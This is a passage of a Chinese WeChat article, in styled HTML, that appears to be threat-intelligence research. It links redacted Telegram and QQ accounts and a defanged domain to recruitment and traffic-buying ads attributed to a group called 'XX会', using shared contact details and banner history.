14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://XXXX/" target="_blank">http://XXXX/</a></span></code><span leaf="">  这个广告里的 QQ 号 XXXX、XXXX 还有两个✈️账号跟招聘广告 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://XXXX/" target="_blank">http://XXXX/</a></span></code><span leaf="">  这里的是重合的，所以至少说明这个高价收量的广告跟招聘广告大概率是同一团队发布。</span></p><p><img data-imgfileid="100001561" class="rich_pages wxw-img" data-ratio="0.6237762237762238" data-s="300,640" data-type="png" data-w="2860" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=e1253ffc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9d7OpgHeSuoUNg9GtxjPTnOtI4ITOE5tMrdmS5iclvDHTfXxu8ibZ909A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXXX</span></code><span leaf=""> 和 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXXX</span></code><span leaf=""> 出现在同一个招聘广告，QQ 号 XXXX、XXXX 都被注释掉了没有展示，标题没写是XX会招人，但是 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXXX</span></code><span leaf=""> 看上去确实是XX会的号。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXXX</span></code><span leaf=""> 和 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXXX </span></code><span leaf=""> 两次出现在不同种类（招聘、收量）的广告，QQ 号 XXXX、XXXX 在页面上都是显示状态，标题写了是XX会招人，但是✈️账号都看不出来到底是不是XX会的人，怎么确定这两组✈️号的主人到底是不是真的有关联，XXXX和XXXX是不是XX会的人呢？</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">论证一下。</span></p><ol style="list-style-type: decimal;margin-top: 8px;margin-bottom: 8px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 25px;padding-right: 0px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXXX</span></code><span leaf=""> 和 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXXX</span></code><span leaf=""> 这两个✈️号是通过 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jiXXXan519[.]com</span></code><span leaf="">  的历史 banner 关联出来的，这个域名看上去很像是为XX会准备的。</span></p></li><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXX</span></code><span leaf="">  这个 &#34;XX会直招&#34; 的号看上去可信度比较高，像是官方招聘账号。</span></p></li><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">搜索 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXX</span></code><span leaf=""> 的时候可以发现有个 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXX_bot  </span></code><span leaf=""> 高度疑似是他本人的 bot 号，商务合作留的联系方式是 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXX916</span></code><span leaf="">。</span></p><p><img data-imgfileid="100001559" class="rich_pages wxw-img" data-ratio="0.4456342668863262" data-s="300,640" data-type="png" data-w="2428" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=7d13e82d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9AicB9WAIy1BXwPPczBn9M9DaAjvYPDM8rsuibibShfj0v6ibfAeB6ib9eUQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></li><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXX</span></code><span leaf=""> 和 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXX </span></code><span leaf=""> 这边网页标题写的是XX会招聘，除此之外看不出来其他的信息跟XX会有关联。</span></p></li><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是搜索  </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXX</span></code><span leaf=""> 和 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXX </span></code><span leaf=""> 的时候，也能发现  </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXX_bot</span></code><span leaf=""> 和 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXX_bot </span></code><span leaf=""> 有类似的广告，商务合作留的联系方式也是 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXX916</span></code><span leaf="">。</span></p><p><img data-imgfileid="100001560" class="rich_pages wxw-img" data-ratio="0.43620414673046254" data-s="300,640" data-type="png" data-w="2508" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=e744c0d5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9jQupicToQDgAX1gEuI2lboD8BX7npmcTUn7e9NOJRictqCvVjzOComgw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001562" class="rich_pages wxw-img" data-ratio="0.4461663947797716" data-s="300,640" data-type="png" data-w="2452" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=42e460ec&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9iauySHK5H4mNet47xBwsStXXfBPwibNX8QsQib0gzfcjsNMkkUHWlQEOg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf=""><br/></span></p></li><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">TG 关系深度论证（在后面单开一小节）。</span></p></li><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">刚才的招聘帖子 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://XXX/" target="_blank">http://XXX/</a></span></code><span leaf="">  中实际上源代码里也有  </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 